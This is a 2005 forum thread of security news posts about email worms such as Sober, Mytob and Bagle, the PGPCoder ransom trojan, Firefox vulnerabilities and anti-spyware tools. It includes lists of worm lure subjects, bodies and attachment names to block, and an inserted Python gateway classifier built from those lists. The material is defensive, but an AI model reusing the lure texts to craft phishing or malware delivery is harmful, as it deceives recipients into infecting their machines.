General discussion
May 20, 2005 at 6:55 am #2183464
May 20, 2005 at 9:43 am #3238437
CBS News Feature — P2P Security & Privacy Dangers
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
CBS News Feature — P2P Privacy Dangers
A summary of some key risks associated with P2P File sharing:
1. Malware (including some of the most dangerous viruses out there) will be automatically written to openly shared hard drives. While AV protection can help, brand new viruses are created daily and seeded on P2P networks.
2. The exchange of music, CDs, and P2P file shares violates copyright laws related to intellectual property rights. Individuals may rationalize that participating in P2P is no worse than using TiVo or copying a movie off of a cable station. Still, the “law is the law”. Due to current widespread practices the RIAA or DMCA can only make “examples” out of some of the unlucky ones they catch in the process.
3. The greatest danger of all is privacy invasion as illustrated in the article. By sharing your hard drive, ANYONE in the P2P network can potentially access ANYTHING on your hard drive. It could be a tax return, bank account spreadsheet, stored email messages, or other sensitive information.
-
May 20, 2005 at 9:43 am #3238438
Sober.P – Beware of Free World Cup 2006 Tickets
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Virus writers continue to use social engineering techniques to trick folks into opening attachments. Sober.P has spread more successfully than most recent viruses, as it can tempt sports fans into thinking they have won something free. Usually in email, there are no “free lunches” as most of these types of emails are like telemarketing calls — there’s always a catch … and in this case you’ll catch a very advanced virus that is difficult to remove from Windows.
Sober.P – Beware of Free World Cup 2006 Tickets
http://www.google.com/search?hl=en&q=world+cup+sober.p
http://www.viruslist.com/en/weblog
http://www.theregister.com/2005/05/03/world_cup_virus/
http://netscape.com.com/4520-6600_7-6215417-1.html
http://www.webuser.co.uk/news/63573.html
Sober.p, which has caused outbreaks in various western European countries, owes some of its success to social engineering. It arrives as an attachment to infected messages which use a range of subject headers, messages and attachment names in both English and German. Some of the messages appear to promise tickets to the World Cup in 2006 – and who wouldn’t want World Cup tickets?
Infected emails pose as ticket confirmation messages from organisers of the football World Cup, due to be held in Germany next year. The worm composes messages with subject lines such as “WM-Ticket-Auslosung” and “Your Password” with attachments such as Fifa_Info-Text.zip containing a .pif payload file. Sober-P only infects Windows machines
-
May 20, 2005 at 9:43 am #3238432
Would you trade a cup of coffee for your password?
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
http://news.com.com/2061-10789-5697143.html
Quote: Security vendor VeriSign found 66 percent would choose to give up their passwords for a Starbucks coffee, during an informal on-the-street survey conducted Thursday in San Francisco … Those that revealed their password or gave hints received a $3 gift card for Starbucks–the price of a latte
This study is sponsored by VeriSign (a leader in digital certificate technologies), so I’m confident 66% of folks surveyed would not truly reveal their passwords. The 66% may have provided a false password or more likely clues on their passwords. Most likely, the true number who would reveal their true passwords is probably less than 10%.
Still, individuals should do their utmost to protect all of their passwords. In helping in security issues, I’ve actually had folks send me their ISP or email account name and password. Sometimes a good strong password is the only lock you have to keep the bad guys out.
This same technique of trying to get users to reveal passwords was used about a year ago.
Would you trade your password for Chocolate?
P.S. Wonder if Starbucks has “Chocolate flavored Coffee”
-
May 20, 2005 at 9:43 am #3238433
SQL-Server 2000 Service Pack 4 – Now Available
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The release of Service Pack 4 for SQL-Server 2000 was on May 6, 2005. After lab testing, this new Service Pack will be worthwhile to install for improved security and to provide bug fixes for functional issues.
-
May 20, 2005 at 9:43 am #3238434
MyDoom.BQ (Mytob.ED) – Medium Risk at Secunia
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This new virus has been declared as MEDIUM RISK by Secunia. TrendLabs has declared a Medium risk alert in order to control this new WORM_MYTOB variant that is currently spreading in Australia and Japan.
It uses a social engineering approach where there appears to be administrative or non-delivery issues associated with email message processing. On all non-delivery messages, it’s always important to never open attachments, even if it appears to be from someone you know or yourself.
MyTob.ED – Medium Risk Trend Micro
Diagram on how this worm spreads & potential to impact network
Email messages to block or avoid:
Subject: (any of the following)
– *IMPORTANT* Please Validate Your Email Account
– *IMPORTANT* Your Account Has Been Locked
– {random}
– Email Account Suspension
– Notice: **Last Warning**
– Notice:***Your email account will be suspended***
– Security measures
– Your email account access is restricted
– Your Email Account is Suspended For Security Reasons
Message body: (any of the following)
– Account Information Are Attached!
– Once you have completed the form in the attached file , your account records will not be interrupted and will continue as normal.
– please look at attached document.
– To safeguard your email account from possible termination, please see the attached file.
– To unblock your email account acces, please see the attachement.
– We have suspended some of your email services, to resolve the problem you should read the attached document.
– {random}
Attachment: (any of the following file names)
– {random}
– document_full
– email-doc
– email-info
– email-text
– IMPORTANT
– information
– info-text
– your_details
(any of the following extensions)
– BAT
– CMD
– EXE
– PIF
– SCR
– ZIP
-
May 20, 2005 at 9:43 am #3238435
Wurmark.J – MEDIUM RISK by Secunia/Trend
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Avoid ZIP based attachments as this one is spreading significantly.
Wurmark.J – MEDIUM RISK by Secunia/Trend
Trend Micro WORM_WURMARK.J Information
quote: As of May 11, 2005 at 4:30 am (Pacific Daylight Time; GMT-7:00) TrendLabs has declared a Medium risk alert in order to control this new WURMARK variant that is currently spreading in France, India, Singapore, and Taiwan.
This memory-resident worm propagates via email messages. Upon execution, it drops a copy of itself in the Windows system folder using a random file name. It also drops a randomly named (Dynamic Link Library) DLL file in the Windows system folder, which is a component of an IESpy, a Spyware program. This worm has a keylogging capability. It saves the logs typed by the user in a dropped random DLL file.
AVOID THE FOLLOWING ATTACHMENTS
Attachment: (any of the following file names)
•details.zip
•girls.zip
•image.zip
•love.zip
•message.zip
•music.zip
•news.zip
•photo.zip
•pic.zip
•readme.zip
•resume.zip
•screensaver.zip
•song.zip
•video.zip
-
May 20, 2005 at 9:43 am #3238428
Firefox 1.04 – Released to address Critical Security issue
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Mozilla has released version 1.04 of Firefox to address a security issue and exploit discovered this week. I have installed the new release for Windows 98, 2000, and XP SP2 with no issues so far. While there are no in-the-wild threats or viruses associated with the new exploit, current Firefox users should upgrade to further protect their systems.
Firefox 1.04 – Security Changes and other release notes
Security Update to Firefox Now Available
Firefox 1.04 Free Download (English version 1.04)
Original Advisories on Security Issues
Mozilla Foundation Security Advisory 2005-42
Secunia – Mozilla Firefox Two Critical Vulnerabilities
The cross-site scripting and remote system access flaws were discovered in Firefox version 1.0.3, but other versions may also be affected, said security company Secunia, which issued the ratings Sunday. The two vulnerabilities, when combined, can be exploited, but no known cases have yet emerged where an attacker took advantage of the public exploit code.
One flaw involves “IFRAME” JavaScript URLs, which are not properly protected from being executed in the context of another URL in the history list. “If you visit a malicious Web site, it can steal cookie information from other Web sites you had previously visited,” said Thomas Kristensen, Secunia’s chief technology officer. The attacker could then use that information to engage in identity theft or gain access to other password-protected sites that the victim visited.
Mozilla issued the following workaround to prevent installing software automatically from web sites. This adds protection for future issues and it enhances security even after upgrading to version 1.04 (and can be toggled on or off as needed).
1. Select the “Options” dialog from the “Tools” menu
2. Select the “Web Features” icon
3. Click the “Allowed Sites” button on the same line as the “Allow web sites to install software” checkbox
4. Click the “Remove All Sites” button
5. Click “OK”
-
May 20, 2005 at 9:43 am #3238429
Microsoft’s AV solution announced – Windows One Care
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Microsoft Windows One Care – Press release
Windows One Care – Related Article
Windows One Care – Key Features
• Defense against viruses and spyware, as well as two way firewall protection
• Performance and reliability tools including disk cleanup, hard drive defragmentation and file repair.
• Backup and restore capabilities to allow users to automate the backup of their files on to CD or DVD, as well as the ability to restore saved versions of files back onto their PC
-
May 20, 2005 at 9:43 am #3238430
F-Secure tests Toyota Prius to see if mobile phone virus can transfer
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This was a neat read in F-Secure’s weblog:
Monday, May 9, 2005
In-depth investigation of the “Cabir-in-Cars” myth
http://www.f-secure.com/weblog/
However a mobile worm infecting a car is a thought that one cannot let go easily, and even as we knew that the car cannot be infected, this was something that just had to be tested for real. So we got a Toyota Prius to test out the myth. Credit has to be given to Toyota for trusting their systems enough to actually lend the car for us for such testing. According to Toyota, this Prius model had identical in-car Bluetooth systems with the Lexus models, so it was suitable for our tests.
-
May 20, 2005 at 9:43 am #3238431
Sober.Q Virus – Produces extensive SPAM in German
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The new Sober.Q variant is installed automatically from existing infected Sober.P systems. It generates extensive SPAM in German. While these SPAM messages don’t contain the virus itself, the URLs most likely point to sites that could contain adware, spyware, or possible viruses.
PLEASE DO NOT CLICK ON ANY URLS in these messages
http://www.f-secure.com/v-descs/sober_q.shtml
Sober.U — Trend Micro has in-depth information
http://vil.nai.com/vil/content/v_133684.htm
Sober.Q was found on May 14th, 2005. This Sober variant doesn’t spread itself in e-mails. Instead, it mass-mails political statements. Sober.Q is installed to computers infected by Sober.P. Sober.Q is written in Visual Basic.
Like many Sober variants, this variant uses its own SMTP engine to send spammed messages to email addresses found on the infected system. It can generate several different email messages randomly, in either English or German depending on the version of Windows. Some messages may contain several links inside them.
-
May 21, 2005 at 5:44 pm #3339065
Firefox users should upgrade to 1.0.4 – new exploits released
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
K-OTic/FrSIRT has released 3 exploits against Firefox 1.03; If you haven’t upgraded to 1.04, this is yet another good reason to do so without delay.
Download Firefox in your preferred flavor. For a description of the problems, Mozilla has the following URLs:
http://www.mozilla.org/security/announce/mfsa2005-44.html http://www.mozilla.org/security/announce/mfsa2005-43.html
-
May 22, 2005 at 5:43 pm #3338909
Secure your wireless network – Easy tips from Kim Komando
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This outline provides an excellent and easy to follow format for securing a wireless network at home. Key approaches include: WPA, turning off unneeded wireless router services, using strong passwords, and reassigning SSIDs. I also recommend using XP SP2 which offers the most up-to-date support for wireless technology by Microsoft.
-
May 24, 2005 at 9:43 am #3242533
Office 12 – Will offer improved server based security on documents
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The next edition of Microsoft Office should become available during 2006. It will offer improved security for server based documents.
Office 12 – Improved server based security on documents
http://techrepublic.com.com/2100-10877_11-5717662.html
Federal record-keeping regulations, such as Sarbanes-Oxley and HIPAA, are forcing Microsoft to examine various ways to secure Office documents. With the next version of Office, Microsoft plans to let businesses set rules, enforced by server-based software, to determine how those documents are handled
Office 12 – Some early reported info on new features
http://techrepublic.com.com/2100-10877_11-5712784.html
-
May 24, 2005 at 5:43 pm #3239222
MS04-023: PGPCoder Trojan – Encrypts & demands $200 for the key
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This is a new malicious attack that’s not widespread and provides all the more reason to stay up-to-date with Microsoft Security updates.
MS04-023: PGPCoder Trojan – Encrypts & demands $200 for the key
http://news.zdnet.com/2100-1009_22-5718678.html
http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=194
http://secunia.com/virus_information/18207/pgpcoder/
Researchers at Symantec have seen the malicious program used in the ransom attack. The “Trojan.Pgpcoder” searches a victim’s hard disk drive for 15 common file types, including images and Microsoft Office file types. It then encrypts the files, removes the originals and drops a note asking $200 for the encryption key, Friedrichs said.
This memory-resident Trojan arrives via Internet or copied from disks. Upon execution, it encrypts all files on the system having the following extensions:
- ASC
- DB
- DB1
- DB2
- DBF
- DOC
- HTM
- HTML
- JPG
- PGP
- RAR
- RTF
- TXT
- XLS
- ZIP
-
May 27, 2005 at 4:47 pm #3180413
Witty Worm – “Patient zero” Analysis of First PCs attacked
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
A recent study was completed related to the Witty worm, which represents one of the most sophisticated attacks using a vulnerability in the BlackICE firewall system. The randomized IP generation and destructive disk algorithms used by Witty are detailed in the Long Version of the slide show below.
Internet Storm Center
http://isc.sans.org/diary.php?date=2005-05-26
Security Focus Article
http://www.securityfocus.com/news/11235
Article – Outwitting the Witty Worm
http://www.cc.gatech.edu/~akumar/witty.html
Slide Show – Long Version
(esp. pages 11-17, 41-42)
http://www.cc.gatech.edu/%7Eakumar/witty_slides.pdf
Slide Show – Short Version
http://www.cc.gatech.edu/%7Eakumar/wisp.pdf
Reflections on Witty: Analyzing the Attacker
http://www.icsi.berkeley.edu/%7Enweaver/login_witty.txt
-
May 28, 2005 at 4:47 pm #3180214
MS05-016:VBS_RUNEXPLT.C (arrives as Word Document)
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This new threat arrives as a Word document and manipulates unpatched Windows PCs, manipulating the recent MS05-016 patch which was part of the April 2005 updates provided by Microsoft.
This malicious VBScript file takes advantage of the Windows Shell vulnerability, which could allow a remote malicious user to execute arbitrary code on the affected system. For more information about this vulnerability, please refer to the following Microsoft page: Microsoft Security Bulletin MS05-016
It usually arrives on a system as a Microsoft Word document. When executed on a vulnerable machine, it attempts to download and execute a file, which may also be malicious in nature, from the following location: Nnpyf.c{BLOCKED}nn.com. This malicious VBScript file runs on Windows 98, ME, 2000, and XP.
-
May 30, 2005 at 8:48 am #3179275
MS04-011: MYTOB.AR – New MEDIUM RISK worm
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Trend and Secunia have issued MEDIUM RISK alerts for MYTOB.AR. Click these links below for more information:
MYTOB.AR – Secunia alert MEDIUM RISK
TREND MICRO – MEDIUM RISK
quote: As of May 30, 2005 3:08 AM (PDT/GMT-7:00), TrendLabs has declared a MEDIUM risk alert in order to control the spread of WORM_MYTOB.AR. TrendLabs has received several infection reports indicating that this worm is currently spreading in Australia, China, Hongkong, India, Japan, Korea, Philippines, Taiwan, and the United States.
Similar to other MYTOB variants, this memory-resident worm propagates by sending a copy of itself as an attachment (file size is around 29,868 to 29,882 bytes) to an email message, which it sends to target recipients using its own Simple Mail Transfer Protocol (SMTP) engine.
EXAMPLE – Usually an EMAIL delivery or account issue
EMAIL FORMAT
Subject: (any of the following)
• {Random}
• *DETECTED* Online User Violation
• *IMPORTANT* Please Validate Your Email Account
• *IMPORTANT* Your Account Has Been Locked
• *WARNING* Your Email Account Will Be Closed
• Account Alert
• Email Account Suspension
• Important Notification
• Notice of account limitation
• Notice: **Last Warning**
• Notice:***Your email account will be suspended***
• Security measures
• Your email account access is restricted
• Your Email Account is Suspended For Security Reasons
Attachment: (any combination of the following file names and extension names)
File name:
• {random}
• account-details
• document
• document_full
• email-doc
• email-info
• info
• information
• info-text
• instructions
• your_details
Extension name: BAT, CMD, EXE, PIF, SCR, ZIP
-
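One way a mail administrator could turn the subject, attachment-name and extension lists from this MYTOB.AR post and the earlier MyTob.ED post into a gateway triage rule. This is an added example, not code from the original thread or from Trend Micro; the sample messages, addresses, placeholder attachment bytes and the allow/review/block verdict labels are constructed here.

```python
# Mail-gateway triage for the MYTOB "account suspended" lures (added example).
# Subjects, attachment base names and extensions are taken from the MyTob.ED
# and MYTOB.AR posts above; sample messages and addresses are constructed.
import email
from email import policy
from email.message import EmailMessage

MYTOB_SUBJECTS = {s.lower() for s in (
    "*IMPORTANT* Please Validate Your Email Account",
    "*IMPORTANT* Your Account Has Been Locked",
    "*DETECTED* Online User Violation",
    "*WARNING* Your Email Account Will Be Closed",
    "Account Alert", "Email Account Suspension", "Important Notification",
    "Notice of account limitation", "Notice: **Last Warning**",
    "Notice:***Your email account will be suspended***", "Security measures",
    "Your email account access is restricted",
    "Your Email Account is Suspended For Security Reasons",
)}
MYTOB_ATTACHMENT_NAMES = {
    "account-details", "document", "document_full", "email-doc", "email-info",
    "email-text", "important", "info", "information", "info-text",
    "instructions", "your_details",
}
EXECUTABLE_EXTENSIONS = {"bat", "cmd", "exe", "pif", "scr", "zip"}


def split_attachment_name(filename):
    """Lower-cased (base, final extension); inner decoy extensions are dropped.
    "Document.txt.EXE" -> ("document", "exe"), "README" -> ("readme", "")."""
    lowered = filename.lower()
    base, dot, ext = lowered.rpartition(".")
    return (base.split(".")[0], ext) if dot else (lowered, "")


def classify(raw_message):
    """Return {'verdict': 'allow'|'review'|'block', 'reasons': [...]}."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    subject = (msg["Subject"] or "").strip().lower()
    reasons = []
    subject_hit = subject in MYTOB_SUBJECTS
    if subject_hit:
        reasons.append(f"subject is a known MYTOB lure: {subject!r}")
    name_hit = risky_ext = False
    for part in msg.iter_attachments():
        filename = part.get_filename()
        if not filename:
            continue
        base, ext = split_attachment_name(filename)
        if ext in EXECUTABLE_EXTENSIONS:
            risky_ext = True
            reasons.append(f"attachment {filename!r} has executable extension .{ext}")
        if base in MYTOB_ATTACHMENT_NAMES:
            name_hit = True
            reasons.append(f"attachment base name {base!r} is on the MYTOB list")
    if risky_ext and (subject_hit or name_hit):
        verdict = "block"    # two independent indicators agree
    elif risky_ext or subject_hit or name_hit:
        verdict = "review"   # a single weak signal: hold for a human
    else:
        verdict = "allow"
    return {"verdict": verdict, "reasons": reasons}


def make_sample(subject, body, attachment=None):
    """Build a constructed test message and return it as raw RFC 822 text."""
    msg = EmailMessage()
    msg["From"] = "it-support@example.test"   # constructed sender
    msg["To"] = "user@example.test"
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment:
        name, data = attachment
        msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=name)
    return msg.as_string()


# Constructed samples; attachment bytes are inert placeholders.
SAMPLE_LURE = make_sample("Email Account Suspension",
    "We have suspended some of your email services, to resolve the problem you "
    "should read the attached document.", ("email-info.zip", b"PK placeholder"))
SAMPLE_RANDOM_SUBJECT = make_sample("xq7ue1", "please look at attached document.",
    ("your_details.txt.pif", b"MZ placeholder"))   # {random} subject, decoy .txt
SAMPLE_PLAIN_ZIP = make_sample("Q2 numbers", "Spreadsheet attached.",
    ("report.zip", b"PK placeholder"))
SAMPLE_BENIGN = make_sample("Lunch Friday?", "Agenda attached.",
    ("agenda.pdf", b"%PDF placeholder"))

if __name__ == "__main__":
    for label, raw in (("lure", SAMPLE_LURE), ("random-subject", SAMPLE_RANDOM_SUBJECT),
                       ("plain-zip", SAMPLE_PLAIN_ZIP), ("benign", SAMPLE_BENIGN)):
        r = classify(raw)
        print(f"{label:15} -> {r['verdict']}: {'; '.join(r['reasons']) or 'no indicators'}")
```

The rule deliberately treats a lone executable extension as "review" rather than "block", since a bare .zip is common legitimate traffic; the worm is only flagged outright when two of its indicators coincide.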
June 1, 2005 at 6:45 am #3179693
Bagle.BO – MEDIUM RISK and spreading extensively
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Please select from links below:
Bagle.BO F-Secure – MEDIUM RISK
McAfee – Bagle.dldr
MESSAGE LABS – SPECIAL ALERT
New Bagle Downloader spreading like wildfire via email
31 May 2005 – MessageLabs is warning computer users to be on their guard against a new variant of the Bagle downloader. MessageLabs has intercepted almost 70,000 copies already. The first copy was intercepted today at 13:24 GMT (14:24 BST). 45,769 copies have been stopped in the last hour (3-4pm BST). The virus appears to have originated from a Yahoo group.
The as yet unnamed Bagle downloader variant drops a trojan that attempts to download Bagle from a vast list of locations. Computer users who activate the file attached in the email invoke the virus, which harvests email addresses it finds on the computer’s hard drive. The virus then forwards itself onto the list of email addresses it has discovered in the infected computer.
-
June 1, 2005 at 10:45 pm #3169910
Mytob.BI – Poses as an IT Administrator
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The social engineering, advanced code, attack methods, and the ease in building new variants makes this family among the worst. Users must keep their AV protection updated daily to keep up with new threats.
Mytob.BI – Poses as an IT Administrator
The Mytob.BI variant prevents the infected machine from accessing several antivirus and security Web sites by redirecting the connection to a local machine, the security company added. While prevalence of the worm is still low, the damage potential is high, Trend Micro said. U.K.-based antivirus company Sophos PLC also rated the worm as a concern, due to the severe damage it could cause.
Researchers speculated that the Mytob worm family is popular with hackers because its code base is relatively easy to manipulate to create a new variant. Another version, Mytob.ar, was detected earlier this week, containing added spyware and adware elements.
The worm poses as a message from an IT administrator, warning recipients that their e-mail accounts are about to be suspended, Trend Micro said. Possible subject headers for the worm include “*IMPORTANT* Please Validate Your Email Account” and “Notice: **Last Warning**.”
-
June 1, 2005 at 10:45 pm #3169909
ISC publishes Scott’s Toolkit for Windows
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The Internet Storm Center shares one handler’s toolkit recommendations. This toolkit looks like it will provide you with everything you will need to monitor, troubleshoot and maintain your network. Some of us might have personal preferences on AV vendors or other items, but it’s still a very nice list.
ISC publishes Scott’s Toolkit for Windows
I’ve created what I call “Security Kits” on both CD-Rs and now the new FlashRAM memory sticks with a lot of these tools on there. You never know which neighbor or relative is going to be next on the list to go help out.
Antivirus Tools
|– McAfee Stinger (updated routinely)
|– Symantec AV Corporate Edition v9 (soon to be v10)
|– Microsoft Malware Removal Tool (released monthly)
|– Current Symantec AV Intelligent Updater
Response Kit
|– NetCat (available now at SecurityFocus)
|– SysInternals AccessEnum
|– SysInternals AutoRuns
|– SysInternals Contig
|– SysInternals DiskView
|– SysInternals FileMon
|– SysInternals ListDLLs
|– SysInternals Page Defrag
|– SysInternals ProcessExplorer
|– SysInternals PS Tools
|– SysInternals RegMon
|– SysInternals Rootkit Revealer
|– SysInternals Sdelete
|– SysInternals ShareEnum
|– SysInternals Sync
|– SysInternals TCPView
|– SysInternals Miscellaneous tools
|– Heysoft LADS
|– myNetWatchman SecCheck
|– Inetcat.org NBTScan
|– FoundStone BinText
|– FoundStone Forensic Toolkit
|– FoundStone Fport
|– FoundStone Galleta
|– FoundStone Pasco
|– FoundStone Rifuti
|– FoundStone Vision
|– FoundStone ShoWin
|– FoundStone SuperScan
|– WinDump
|– Nmap
|– Tigerteam.se SBD (encrypted netcat)
|– GNU based unxutils (from unixutils.sourceforge.net)
|– Good copies of windows binaries (netstat, cmd, ipconfig, nbtstat)
Spyware Tools
|– AdAware (updated defs in same directory)
|– CWShredder
|– Hijack This
|– MS AntiSpyWare Beta
|– Spybot Search and Destroy (updated defs in same directory)
|– BHO Demon
Security Tools (this is my usual place to dump the .zip or .exe installers)
|– Heysoft LADS (list alternate data streams)
|– Inetcat.org NBTScan
|– MS Baseline Security Analyzer
|– MS IIS Lockdown tool
|– Sam Spade
|– SSH Client (SSH.com or Putty)
|– SysInternals Tools
|– Foundstone Tools
|– BlackIce PC Protection
|– Kerio Personal Firewall
|– Zone Alarm Personal Firewall
|– WinPcap
|– WinDump
|– Ethereal Installer
|– Nmap for windows (cli version)
Utilities
|– Adobe Acrobat Reader Installer
|– CPU-Z
|– FireFox Installer
|– Macromedia Flash and ShockWave Installers
|– Quicktime Standalone Installer
|– VNC Installer
|– Winzip Installer
|– ISCAlert
Service Packs ( on a 2nd CD )
|– Windows XP SP2
|– Windows 2000 SP4 (+rpc/lsass critical patches or SRP when released)
|– Windows 2003 Server SP1
(Some additional CDs I keep around for the Unix geek in me)
Knoppix CD
Helix CD
Note: Any commercial software above that is not freeware/shareware in the list above should be replaced in your toolkit with your company or campus licensed software.
-
June 3, 2005 at 6:45 am #3172442
MS04-011: Bobax.P – MEDIUM RISK at Trend
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Trend has declared a MEDIUM RISK due to prevalence.
MS04-011: Bobax.P – MEDIUM RISK at Trend
MS04-011: Bobax.Z – Symantec version
W32.Bobax.Z is a mass-mailing worm that lowers security settings and allows a compromised computer to be used as a covert proxy. The worm also sends an email to addresses gathered from the compromised computer.
As of June 3, 2005 1:38 AM (PDT/GMT-7:00), TrendLabs has declared a MEDIUM risk alert in order to control the spread of WORM_BOBAX.P. TrendLabs has received several infection reports indicating that this worm is currently spreading in the United States, Singapore, Ireland, Japan, Peru, Australia and India.
Message body: (any of the following)
——————————————
Attached some pics that i found
Check this out 🙂
Hello,
I was going through my album, and look what I found..
Long time! Check this out!
Osama Bin Laden Captured.
Remember this?
Saddam Hussein – Attempted Escape, Shot dead
Secret!
Testing
-
June 4, 2005 at 10:46 am #3170297
Spybot Search & Destroy version 1.4 available
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Spyware S&D is an excellent spyware removal tool that is free for personal use. The following provide some key links from download.com:
Download.com Review of Spybot – Search & Destroy
The latest version of Spybot – Search & Destroy adds some truly useful features to an already excellent application. The program still checks your system against a comprehensive database of adware and other system invaders, but it works much faster now. It also features several interface improvements, including multiple skins for dressing up its appearance. Scan results now appear arranged by groups in a tree, and a sliding panel lets you instantly view information about a selected item to help you decide whether to kill it or not. The Immunize feature blocks a plethora of uninvited Web-borne flotsam before it reaches your computer. Other useful tools, including Secure Shredder, complement the program’s basic functionality for completely destroying files. Hosts File blocks adware servers from your computer, and System Startup lets you review which apps load when you start your computer. The functionality makes Spybot – Search & Destroy a must-have for all Internet users, and this version is a worthwhile upgrade.
-
June 4, 2005 at 10:46 am #3170298
Ad-Aware SE Personal Edition 1.06 available
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Ad-Aware SE Personal Edition 1.06 is an excellent adware and spyware removal tool that is free for personal use. The following provide some key links from download.com:
Ad-Aware SE Personal Edition 1.06 – Information
Download.com Review of Ad-Aware SE Personal Edition
One of the first applications built to find and remove adware and spyware, Ad-aware SE Personal Edition’s excellent reputation is well justified. The sky-blue, skinnable interface features five buttons. The first two, Status and Scan, lead to the core function of the application. These buttons initiate a scan of your files for adware components. After scanning is complete, the program presents a summary of results, followed by a list from which you select exactly which components to remove. Right-clicking an individual entry gives some information about the piece of suspected adware, though we would like more details. Ad-aware SE can alert you to more malignant forms of malware by separating items into critical and negligible categories. The third button, Ad-watch, is nonfunctional in the Standard version. The fourth button, Plug-ins, shows you which Ad-aware plug-ins are installed. The fifth leads to the help files.
Ad-aware SE does an excellent job of quickly finding and removing most adware and spyware components, although you will have to restart and rescan for a seriously infected machine. We were pleased to see an auto-update feature included with the program, keeping Ad-aware up-to-date with the latest adware components. Ad-aware SE should be part of your arsenal for keeping your machine free of adware and spyware components.
-
June 4, 2005 at 10:46 am #3170296
Downloader.ABL (aka Small.AHE) – MEDIUM RISK (Osama virus)
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Trend/Secunia also declared MEDIUM RISK on Troj Small.AHE, which is different than Bobax.P, but centers on the same theme.
For users, it’s essential to AVOID attachments from ANY politically themed email, as that’s often a common social engineering threat (like we saw with the German Sober.Q spam)
Secunia Information
http://secunia.com/virus_information/18540/
http://secunia.com/virus_information/18574/
This downloader trojan was mass-spammed on June 2, 2005. It may arrive in an email message as follows (messages vary):
Subject:
God Bless the USA!
Finally!
Captured..
He has captured..
Body:
Xmong. Npos alter. almonsted nocks
Turn on your TV. Osama Bin Laden has been captured. While CNN has no pictures at this point of time, the military channel (PPV) released some pictures. I managed to capture a couple of these pictures off my TV. Ive attached a slideshow containing all the pictures I managed to capture. I apologize for the low quality, its the best I could do at this point of time. Hopefully CNN will have pictures and a video soon. God bless the USA! Stephen Christensen
Attachment: pics.zip, teamster.zip, usurus.zip, toxicology.zip
-
June 6, 2005 at 2:46 pm #3171523
MS04-007: RBOT variant – 1st worm to exploit ASN.1 via Internet
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Kaspersky’s weblog entry of June 5th entitled “Robots, vile robots everywhere!” is a great read.
MS04-007: RBOT variant – 1st worm to exploit ASN.1 via Internet
Investigation of the packets revealed a Microsoft ASN.1 exploit, which tries to download and run an executable from the attacking machine via TFTP. We’ve secured a binary and took a look under the cover. The responsible worm was a Rbot variant, …
Besides the ASN.1 exploit – and this is the first worm to use it successfully on the Internet – the Rbot variant uses a multitude of other exploits, DCOM, RPC, Veritas Backup Exec, LSASS, MSSQL, password guessing and so on. It also steals registration keys from a good list of popular games, PayPal accounts logins, has an embedded backdoor and of course, DDoS capabilities.
Basically, it’s a worm which tries very hard to spread while at the same time, it tries to steal as many valuable data from the victim machine as it is available. It is a highly infectious worm, written for profit. And yes, most of the other worms we’re seeing nowadays are no different.
-
June 7, 2005 at 6:46 am #3171218
Secunia Advisory – Mozilla Frame Injection Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Secunia has issued a moderately critical advisory for Mozilla browsers including Firefox 1.04 for a Frame Injection Vulnerability. This new vulnerability has not been exploited in-the-wild and can only occur while processing a trusted and hostile web site at the same time. Firefox users should look for an upcoming release and always be careful of sites visited and email URL links.
ZdNet Article: Mozilla Frame Injection Vulnerability
A 7-year-old flaw that could let an attacker place malicious content on trusted Web sites has resurfaced in the most recent Firefox browser, Secunia has warned. The flaw, which also affects some other Mozilla Foundation programs, lies in the way the software handles frames, which are a way of showing Web content in separate parts of the browser window.
As a result, an attacker could insert content into a frame on a trusted Web site, Secunia said. Account holders who believe they are interacting with a frame belonging to an online bank could be tricked into giving up personal information or downloading malicious code, for example. Secunia rated the issue “moderately critical.” The same “frame injection” vulnerability in Mozilla’s browsers was detailed by Secunia in July of last year. At the time, it did not affect the most recent versions of the applications.
For a spoofing attempt to work, a surfer would need to have both the attacker’s Web site and a trusted Web site open in different windows. A click on a link on the malicious site would then display the attacker’s content in a frame on the trusted Web site, Secunia said. The company advised people not to visit trusted and untrusted Web sites at the same time.
Secunia Advisory – Mozilla Frame Injection Vulnerability
Description: A seven year old vulnerability has been re-introduced in Mozilla and Firefox, which can be exploited by malicious people to spoof the contents of web sites.
Secunia Browser Frame Injection Vulnerability Test
The vulnerability has been confirmed in Firefox 1.0.4 and Mozilla 1.7.8. Other versions may also be affected.
Solution: Do not browse untrusted web sites while browsing trusted sites.
Mozilla Support Forums Information
